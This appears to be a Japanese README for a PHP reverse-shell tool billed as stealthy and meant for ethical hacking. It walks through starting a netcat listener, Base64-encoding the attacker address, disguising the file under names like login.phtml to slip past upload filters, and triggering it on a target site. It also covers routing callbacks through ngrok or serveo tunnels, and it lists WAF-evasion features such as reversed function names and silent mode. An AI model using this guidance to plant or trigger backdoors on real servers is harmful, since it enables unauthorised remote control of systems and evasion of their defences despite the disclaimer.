
これは、倫理的なハッキングやペネトレーションテストのために設計された、パワフルでステルス性の高いPHPリバースシェルです。信頼性が高く、静かにあなたのマシンへの接続を確立します。
これは、倫理的なハッキングや侵入テスト向けに設計された、強力かつステルス性の高い PHP リバースシェルです。 マシンへの信頼性が高く静かな接続を確立します。
この PHP リバースシェルは、教育目的および許可された侵入テストの目的にのみ使用するために開発されています。
開発者は、この reverse_shell を使用して行われたいかなる誤用、損害、または違法行為についても責任を負いません。
責任を持って使用し、自分が所有しているか、テストする明示的な許可があるシステムでのみ使用してください。不正アクセスは違法であり、法律で罰せられます。
IP およびシェルコマンドはステルス性のため Base64 エンコードされます
関数名が逆順になり、WAF やセキュリティフィルターをバイパスします
サイレントモード — 検出を避けるため出力を表示しない
接続が切れた場合に自動的に再接続します
バックグラウンドデーモンとして実行可能(サーバーがサポートしている場合)
ほとんどの PHP 対応サーバーで動作します
Ngrok、Serveo などのトンネリングサービスをサポート
一部のフィルターをバイパスするために .phtml 拡張子でアップロード
1. マシン上でリスナーを起動
nc -lvnp 4444
2. IP またはホスト名を Base64 でエンコード
以下の簡単なコマンドを使用します:
echo "your_ip_or_hostname" | base64
例:
echo "192.168.1.5" | base64
出力をコピーし、PHP リバースシェルスクリプト内の $ip_b64 値を置き換えてください。
3. PHP リバースシェルスクリプトを更新:
これらの行を、Base64 エンコードされた IP/ホスト名とポートに変更します:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. ファイル名を変更してアップロード
ファイルをより疑われにくい名前に変更します。例:
login.phtml
avatar.phtml
update.phtml
.phtml 拡張子を使用すると、.php をブロックする一部のサーバーでファイルが実行されるのに役立ちます。
このファイルを、ファイルアップロードが許可されているターゲットウェブサイトにアップロードします。
5. リバースシェルを起動
アップロードしたファイルをブラウザで開きます:
http://target.com/uploads/login.phtml
開かれると、リスナーがリバースシェル接続を受け取ります。
モバイルデータを使用している場合やルーター(NAT)の背後にいる場合、IP がパブリックでない可能性があります。 その場合、リバースシェルは直接マシンに到達できません。
これを解決するには、Ngrok や Serveo などの TCP トンネリングツールを使用します。
Ngrok をインストール
以下のコマンドを実行:
ngrok tcp 4444
次のように表示されます:
Forwarding tcp://4.tcp.ngrok.io:18900
PHP リバースシェルスクリプトを更新:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
リスナーを起動:
nc -lvnp 4444
以下のコマンドを実行:
ssh -R 0:localhost:4444 serveo.net
次のように表示されます:
Forwarding TCP connections from serveo.net:46603
PHP リバースシェルスクリプトを更新:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
リスナーを起動:
nc -lvnp 4444
このプロジェクトは GNU General Public License v3.0 の下でライセンスされています。